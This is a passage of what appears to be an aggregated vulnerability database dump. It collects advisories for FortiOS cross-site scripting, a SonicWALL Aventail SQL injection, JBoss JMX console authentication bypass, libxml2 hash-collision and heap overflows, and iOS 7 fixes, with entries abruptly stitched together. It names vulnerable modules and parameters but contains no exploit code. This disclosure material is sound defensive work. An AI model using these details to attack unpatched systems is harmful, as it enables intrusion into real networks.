http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0151
[ 39 ] CVE-2013-0152
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0152
[ 40 ] CVE-2013-0153
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0153
[ 41 ] CVE-2013-0154
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0154
[ 42 ] CVE-2013-0215
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0215
[ 43 ] CVE-2013-1432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1432
[ 44 ] CVE-2013-1917
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1917
[ 45 ] CVE-2013-1918
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1918
[ 46 ] CVE-2013-1919
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1919
[ 47 ] CVE-2013-1920
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1920
[ 48 ] CVE-2013-1922
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1922
[ 49 ] CVE-2013-1952
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1952
[ 50 ] CVE-2013-1964
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1964
[ 51 ] CVE-2013-2076
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2076
[ 52 ] CVE-2013-2077
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2077
[ 53 ] CVE-2013-2078
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2078
[ 54 ] CVE-2013-2194
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2194
[ 55 ] CVE-2013-2195
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2195
[ 56 ] CVE-2013-2196
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2196
[ 57 ] CVE-2013-2211
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2211
[ 58 ] Xen TMEM
http://lists.xen.org/archives/html/xen-announce/2012-09/msg00006.h=
tml
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201309-24.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2013 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
VAR-202002-0084 | CVE-2011-3336 |
regcomp of BSD implementation Resource exhaustion vulnerability in
Related entries in the VARIoT exploits database: VAR-E-201010-1183, VAR-E-201101-0760, VAR-E-201010-0031, VAR-E-201302-0650 |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
regcomp in the BSD implementation of libc is vulnerable to denial of service due to stack exhaustion. PHP is prone to an 'open_basedir' restriction-bypass vulnerability because of a design error.
Successful exploits could allow an attacker to read and write files in unauthorized locations.
This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code. In such cases, 'open_basedir' restrictions are expected to isolate users from each other.
PHP 5.2.11 and 5.3.0 are vulnerable; other versions may also be affected.
Successful exploits will allow attackers to make the applications that use the affected library, unresponsive, denying service to legitimate users.
The libc library of the following platforms are affected:
NetBSD 5.1
OpenBSD 5.0
FreeBSD 8.2
Apple Mac OSX
Other versions may also be affected. NetBSD is a free and open source Unix-like operating system developed by the NetBSD Foundation
VAR-201802-0013 | CVE-2012-0941 | Fortinet FortiOS Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in Fortinet FortiGate UTM WAF appliances with FortiOS 4.3.x before 4.3.6 allow remote attackers to inject arbitrary web script or HTML via vectors involving the (1) Endpoint Monitor, (2) Dialup List, or (3) Log&Report Display modules, or the fields_sorted_opt parameter to (4) user/auth/list or (5) endpointcompliance/app_detect/predefined_sig_list. Fortinet FortiOS Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Fortinet FortiGate UTM WAF appliances is a firewall device from Fortinet. FortiOS is an operating system that runs on it. Remote attackers can exploit this vulnerability to inject arbitrary Web scripts or HTML. Title:
======
Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities
Date:
=====
2012-01-27
References:
===========
http://vulnerability-lab.com/get_content.php?id=144
VL-ID:
=====
144
Introduction:
=============
The FortiGate series of multi-threat security systems detect and eliminate the most damaging, content-based threats from email
and Web traffic such as viruses, worms, intrusions, inappropriate Web content and more in real time - without degrading
network performance.
Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 series for large enterprises, service providers and
carriers, the FortiGate line combines the FortiOS™ security operating system with FortiASIC processors and other hardware to provide
a comprehensive and high-performance array of security and networking functions including:
* Firewall, VPN, and Traffic Shaping
* Intrusion Prevention System (IPS)
* Antivirus/Antispyware/Antimalware
* Web Filtering
* Antispam
* Application Control (e.g., IM and P2P)
* VoIP Support (H.323. and SCCP)
* Layer 2/3 routing
* Multiple WAN interface options
FortiGate appliances provide cost-effective, comprehensive protection against network, content, and application-level threats - including
complex attacks favored by cybercriminals - without degrading network availability and uptime. FortiGate platforms incorporate sophisticated
networking features, such as high availability (active/active, active/passive) for maximum network uptime, and virtual domain (VDOM)
capabilities to separate various networks requiring different security policies.
(Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate/ && http://www.avfirewalls.com/)
Abstract:
=========
1.1
Vulnerability-Lab Team discovered multiple persistent Web Vulnerabilities on the FortiGate UTM Appliance Application.
1.2
Vulnerability-Lab Team discovered multiple non-persistent Web Vulnerabilities on the FortiGate UTM Appliance Application.
Report-Timeline:
================
2012-01-27: Public or Non-Public Disclosure
Status:
========
Published
Affected Products:
==================
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
1.1
Multiple input validation vulnerabilities(persistent) are detected on FortGate UTM Appliance Series. Remote attacker can include (persistent)
malicious script code to manipulate specific customer/admin requests. The vulnerability allows an local low privileged attacker to manipulate
the appliance(application) via persistent script code inject.
It is also possible to hijack customer sessions via persistent script code execution on application side. Successful exploitation can also
result in content/module request manipulation, execution of persistent malicious script code, session hijacking, account steal & phishing.
Vulnerable Module(s): (Persistent)
[+] Endpoint => Monitor => Endpoint Monitor
[+] Dailup List
[+] Log&Report => Display
Picture(s):
../ive2.png
../ive3.png
1.2
Multiple input validation vulnerabilities(non-persistent) are detected on FortGate UTM Appliance Series. The vulnerability allows remote
attackers to hijack admin/customer sessions with required user inter action (client-side). Successful exploitation allows to phish user accounts,
redirect over client side requests or manipulate website context on client-side browser requests.
Vulnerable Module(s): (Non-Persistent)
[+] Endpoint -> NAC -> Application Database -> Listings
[+] List field sorted
Picture(s):
../ive1.png
Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with or without user inter action. For demonstration or reproduce ...
poc: => http://www.vulnerability-lab.com/get_content.php?id=144
Solution:
=========
1.1
To fix/patch the persistent input validation vulnerabilities restrict the input fields & parse the input.
Locate the vulnerable area(s) reproduce the bugs & parse the output after a malicious(test) insert.
Setup a filter or restriction mask to prevent against future persistent input validation attacks.
1.2
To fix the client side input validation vulnerability parse the vulnerable request by filtering the input & cleanup the output.
Set a input restriction or configure whitelist/filter to stop client side requests and form a secure exception-handling around.
Risk:
=====
1.1
The security risk of the persistent vulnerabilities are estimated as high because of multiple persistent input validation vulnerabilities on different modules.
1.2
The security risk of the non-persistent cross site requests are estimated as low because of required user inter-action to hijack a not expired session.
Credits:
========
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.
Copyright © 2012|Vulnerability-Lab
--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com
. ----------------------------------------------------------------------
SC Magazine awards the Secunia CSI a 5-Star rating
Top-level rating for ease of use, performance, documentation, support, and value for money. Read more and get a free trial here: http://secunia.com/blog/296
----------------------------------------------------------------------
TITLE:
JBoss Multiple Products JMX Console Authentication Bypass
SECUNIA ADVISORY ID:
SA47850
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/47850/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=47850
RELEASE DATE:
2012-02-06
DISCUSS ADVISORY:
http://secunia.com/advisories/47850/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/47850/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=47850
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A security issue has been reported in multiple JBoss products, which
can be exploited by malicious people to bypass certain security
restrictions.
The security issue is caused due to improper access restrictions to
the JMX Console.
For more information see vulnerability #1 in:
SA39563
The security issue is reported in the following products:
* JBoss Communications Platform 1.2
* JBoss Enterprise Application Platform 5.0 and 5.0.1
* JBoss Enterprise Portal Platform 4.3
* JBoss Enterprise Web Platform 5.0
* JBoss SOA-Platform 4.2, 4.3, and 5.0
SOLUTION:
Update to a fixed version.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
ORIGINAL ADVISORY:
JBPAPP-3952:
https://issues.jboss.org/browse/JBPAPP-3952
JBPAPP-4713:
https://issues.jboss.org/browse/JBPAPP-4713
Red Hat Doc#30741:
https://access.redhat.com/kb/docs/DOC-30741
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-201302-0005 | CVE-2011-5262 | SonicWALL Aventail In SQL Injection vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SQL injection vulnerability in prodpage.cfm in SonicWALL Aventail allows remote attackers to execute arbitrary SQL commands via the CategoryID parameter. SonicWALL Aventail is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Further research conducted by the vendor indicates this issue may not be a vulnerability affecting the application. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs
VAR-201212-0268 | CVE-2012-0841 | libxml2 Resource Management Error Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
libxml2 before 2.8.0 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted XML data. libxml2 is prone to a denial-of-service vulnerability.
An attacker can exploit this issue by sending specially crafted requests to the affected application that uses a hash table. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc. The vulnerability is caused by the program calculating the hash value without pre-limiting the hash collision. An
attacker with a privileged network position may inject arbitrary
contents. This issue was addressed by using an encrypted HTTPS
connection to retrieve tutorials. ============================================================================
Ubuntu Security Notice USN-1376-1
February 27, 2012
libxml2 vulnerability
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.10
- Ubuntu 10.04 LTS
- Ubuntu 8.04 LTS
Summary:
libxml2 could be made to cause a denial of service by consuming excessive
CPU resources.
Software Description:
- libxml2: GNOME XML library
Details:
Juraj Somorovsky discovered that libxml2 was vulnerable to hash table
collisions.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 11.10:
libxml2 2.7.8.dfsg-4ubuntu0.2
Ubuntu 11.04:
libxml2 2.7.8.dfsg-2ubuntu0.3
Ubuntu 10.10:
libxml2 2.7.7.dfsg-4ubuntu0.4
Ubuntu 10.04 LTS:
libxml2 2.7.6.dfsg-1ubuntu1.4
Ubuntu 8.04 LTS:
libxml2 2.6.31.dfsg-2ubuntu1.8
After a standard system update you need to reboot your computer to make
all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2417-1 security@debian.org
http://www.debian.org/security/ Nico Golde
February 22, 2012 http://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : libxml2
Vulnerability : computational denial of service
Problem type : local/remote
Debian-specific: no
Debug bug : 660846
CVE ID : CVE-2012-0841
It was discovered that the internal hashing routine of libxml2,
a library providing an extensive API to handle XML data, is vulnerable to
predictable hash collisions. Given an attacker with knowledge of the
hashing algorithm, it is possible to craft input that creates a large
amount of collisions. As a result it is possible to perform denial of
service attacks against applications using libxml2 functionality because
of the computational overhead.
For the stable distribution (squeeze), this problem has been fixed in
version 2.7.8.dfsg-2+squeeze3.
For the testing (wheezy) and unstable (sid) distributions, this problem
will be fixed soon.
We recommend that you upgrade your libxml2 packages.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
.
Background
==========
libxml2 is the XML C parser and toolkit developed for the Gnome
project.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/libxml2 < 2.7.8-r5 >= 2.7.8-r5
Description
===========
libxml2 does not properly randomize hash functions to protect against
hash collision attacks.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All libxml2 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.7.8-r5"
References
==========
[ 1 ] CVE-2012-0841
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0841
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201203-04.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. Relevant releases
ESX 5.0 without patch ESXi500-201207101-SG
3. Problem Description
a. ESXi update to third party component libxml2
The libxml2 third party library has been updated which addresses
multiple security issues
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-4008, CVE-2010-4494, CVE-2011-0216,
CVE-2011-1944, CVE-2011-2821, CVE-2011-2834, CVE-2011-3905,
CVE-2011-3919 and CVE-2012-0841 to these issues.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
========== ======== ======== =================
vCenter any Windows not affected
hosted * any any not affected
ESXi 5.0 any ESXi500-201207101-SG
ESXi 4.1 any patch pending
ESXi 4.0 any patch pending
ESXi 3.5 any patch pending
ESX any any not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
Note: "patch pending" means that the product is affected,
but no patch is currently available. The advisory will be
updated when a patch is available. Solution
Please review the patch/release notes for your product and
version and verify the checksum of your downloaded file.
ESXi 5.0
--------
ESXi500-201207001
md5sum: 01196c5c1635756ff177c262cb69a848
sha1sum: 85936f5439100cd5fb55c7add574b5b3b937fe86
http://kb.vmware.com/kb/2020571
ESXi500-201207001 contains ESXi500-201207101-SG
5. Change log
2012-07-12 VMSA-2012-0012
Initial security advisory in conjunction with the release of a patch
for ESXi 5.0 on 2012-07-12. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2012 VMware Inc. All rights reserved. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Avaya Voice Portal Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA50614
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50614/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50614
RELEASE DATE:
2012-09-21
DISCUSS ADVISORY:
http://secunia.com/advisories/50614/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50614/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50614
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Avaya has acknowledged a weakness and multiple vulnerabilities in
Avaya Voice Portal, which can be exploited by malicious, local users
to disclose system and sensitive information and by malicious people
to bypass certain security restrictions and cause a DoS (Denial of
Service).
For more information:
SA44490
SA46460
SA46958
SA48000
The weakness and vulnerabilities are reported in versions 5.0, 5.1,
5.1.1, and 5.1.2.
SOLUTION:
Update to Avaya Enterprise Linux for Voice Portal 5.1.3 and Voice
Portal 5.1.3.
ORIGINAL ADVISORY:
Avaya (ASA-2011-154, ASA-2012-137, ASA-2012-139, ASA-2012-166,
ASA-2012-207):
https://downloads.avaya.com/css/P8/documents/100141102
https://downloads.avaya.com/css/P8/documents/100160023
https://downloads.avaya.com/css/P8/documents/100160589
https://downloads.avaya.com/css/P8/documents/100160780
https://downloads.avaya.com/css/P8/documents/100162507
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Summary:
Updated mingw32-libxml2 packages that fix several security issues are now
available for Red Hat Enterprise Linux 6. This advisory also contains
information about future updates for the mingw32 packages, as well as the
deprecation of the packages with the release of Red Hat
Enterprise Linux 6.4.
The Red Hat Security Response Team has rated this update as having
important security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Optional (v. 6) - noarch
Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch
Red Hat Enterprise Linux Server Optional (v. 6) - noarch
Red Hat Enterprise Linux Workstation Optional (v. 6) - noarch
3. Description:
These packages provide the libxml2 library, a development toolbox providing
the implementation of various XML standards, for users of MinGW (Minimalist
GNU for Windows).
IMPORTANT NOTE: The mingw32 packages in Red Hat Enterprise Linux 6 will no
longer be updated proactively and will be deprecated with the release of
Red Hat Enterprise Linux 6.4. These packages were provided to support other
capabilities in Red Hat Enterprise Linux and were not intended for direct
customer use. Customers are advised to not use these packages with
immediate effect. Future updates to these packages will be at Red Hat's
discretion and these packages may be removed in a future minor release.
A heap-based buffer overflow flaw was found in the way libxml2 decoded
entity references with long names. A remote attacker could provide a
specially-crafted XML file that, when opened in an application linked
against libxml2, would cause the application to crash or, potentially,
execute arbitrary code with the privileges of the user running the
application. (CVE-2011-3919)
A heap-based buffer underflow flaw was found in the way libxml2 decoded
certain entities. A remote attacker could provide a specially-crafted XML
file that, when opened in an application linked against libxml2, would
cause the application to crash or, potentially, execute arbitrary code with
the privileges of the user running the application. (CVE-2012-5134)
It was found that the hashing routine used by libxml2 arrays was
susceptible to predictable hash collisions. Sending a specially-crafted
message to an XML service could result in longer processing time, which
could lead to a denial of service. To mitigate this issue, randomization
has been added to the hashing function to reduce the chance of an attacker
successfully causing intentional collisions. (CVE-2012-0841)
Multiple flaws were found in the way libxml2 parsed certain XPath (XML Path
Language) expressions. If an attacker were able to supply a
specially-crafted XML file to an application using libxml2, as well as an
XPath expression for that application to run against the crafted file, it
could cause the application to crash. (CVE-2010-4008, CVE-2010-4494,
CVE-2011-2821, CVE-2011-2834)
Two heap-based buffer overflow flaws were found in the way libxml2 decoded
certain XML files. A remote attacker could provide a specially-crafted XML
file that, when opened in an application linked against libxml2, would
cause the application to crash or, potentially, execute arbitrary code with
the privileges of the user running the application. (CVE-2011-0216,
CVE-2011-3102)
An integer overflow flaw, leading to a heap-based buffer overflow, was
found in the way libxml2 parsed certain XPath expressions. If an attacker
were able to supply a specially-crafted XML file to an application using
libxml2, as well as an XPath expression for that application to run against
the crafted file, it could cause the application to crash or, possibly,
execute arbitrary code. (CVE-2011-1944)
An out-of-bounds memory read flaw was found in libxml2. A remote attacker
could provide a specially-crafted XML file that, when opened in an
application linked against libxml2, would cause the application to crash. Upstream acknowledges Bui Quang Minh from Bkis as the
original reporter of CVE-2010-4008.
All users of mingw32-libxml2 are advised to upgrade to these updated
packages, which contain backported patches to correct these issues.
4.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
645341 - CVE-2010-4008 libxml2: Crash (stack frame overflow or NULL pointer dereference) by traversal of XPath axis
665963 - CVE-2010-4494 libxml2: double-free in XPath processing code
709747 - CVE-2011-1944 libxml, libxml2: Heap-based buffer overflow by adding new namespace node to an existing nodeset or merging nodesets
724906 - CVE-2011-0216 libxml2: Off-by-one error leading to heap-based buffer overflow in encoding
735712 - CVE-2011-2821 libxml2: double free caused by malformed XPath expression in XSLT
735751 - CVE-2011-2834 libxml2: double-free caused by malformed XPath expression in XSLT
767387 - CVE-2011-3905 libxml2 out of bounds read
771896 - CVE-2011-3919 libxml2: Heap-based buffer overflow when decoding an entity reference with a long name
787067 - CVE-2012-0841 libxml2: hash table collisions CPU usage DoS
822109 - CVE-2011-3102 libxml: An off-by-one out-of-bounds write by XPointer part evaluation
880466 - CVE-2012-5134 libxml2: Heap-buffer-underflow in xmlParseAttValueComplex
6. Package List:
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/mingw32-libxml2-2.7.6-6.el6_3.src.rpm
noarch:
mingw32-libxml2-2.7.6-6.el6_3.noarch.rpm
mingw32-libxml2-debuginfo-2.7.6-6.el6_3.noarch.rpm
mingw32-libxml2-static-2.7.6-6.el6_3.noarch.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/mingw32-libxml2-2.7.6-6.el6_3.src.rpm
noarch:
mingw32-libxml2-2.7.6-6.el6_3.noarch.rpm
mingw32-libxml2-debuginfo-2.7.6-6.el6_3.noarch.rpm
mingw32-libxml2-static-2.7.6-6.el6_3.noarch.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/mingw32-libxml2-2.7.6-6.el6_3.src.rpm
noarch:
mingw32-libxml2-2.7.6-6.el6_3.noarch.rpm
mingw32-libxml2-debuginfo-2.7.6-6.el6_3.noarch.rpm
mingw32-libxml2-static-2.7.6-6.el6_3.noarch.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/mingw32-libxml2-2.7.6-6.el6_3.src.rpm
noarch:
mingw32-libxml2-2.7.6-6.el6_3.noarch.rpm
mingw32-libxml2-debuginfo-2.7.6-6.el6_3.noarch.rpm
mingw32-libxml2-static-2.7.6-6.el6_3.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2010-4008.html
https://www.redhat.com/security/data/cve/CVE-2010-4494.html
https://www.redhat.com/security/data/cve/CVE-2011-0216.html
https://www.redhat.com/security/data/cve/CVE-2011-1944.html
https://www.redhat.com/security/data/cve/CVE-2011-2821.html
https://www.redhat.com/security/data/cve/CVE-2011-2834.html
https://www.redhat.com/security/data/cve/CVE-2011-3102.html
https://www.redhat.com/security/data/cve/CVE-2011-3905.html
https://www.redhat.com/security/data/cve/CVE-2011-3919.html
https://www.redhat.com/security/data/cve/CVE-2012-0841.html
https://www.redhat.com/security/data/cve/CVE-2012-5134.html
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2013-09-18-2 iOS 7
iOS 7 is now available and addresses the following:
Certificate Trust Policy
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Root certificates have been updated
Description: Several certificates were added to or removed from the
list of system roots.
CoreGraphics
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JBIG2
encoded data in PDF files. This issue was addressed through
additional bounds checking.
CVE-ID
CVE-2013-1025 : Felix Groebert of the Google Security Team
CoreMedia
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of Sorenson
encoded movie files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2013-1019 : Tom Gallagher (Microsoft) & Paul Bates (Microsoft)
working with HP's Zero Day Initiative
Data Protection
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Apps could bypass passcode-attempt restrictions
Description: A privilege separation issue existed in Data
Protection. An app within the third-party sandbox could repeatedly
attempt to determine the user's passcode regardless of the user's
"Erase Data" setting. This issue was addressed by requiring
additional entitlement checks.
CVE-ID
CVE-2013-0957 : Jin Han of the Institute for Infocomm Research
working with Qiang Yan and Su Mon Kywe of Singapore Management
University
Data Security
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may intercept
user credentials or other sensitive information
Description: TrustWave, a trusted root CA, has issued, and
subsequently revoked, a sub-CA certificate from one of its trusted
anchors. This sub-CA facilitated the interception of communications
secured by Transport Layer Security (TLS). This update added the
involved sub-CA certificate to OS X's list of untrusted certificates.
CVE-ID
CVE-2013-5134
dyld
Available for: iPhone 4 and later,
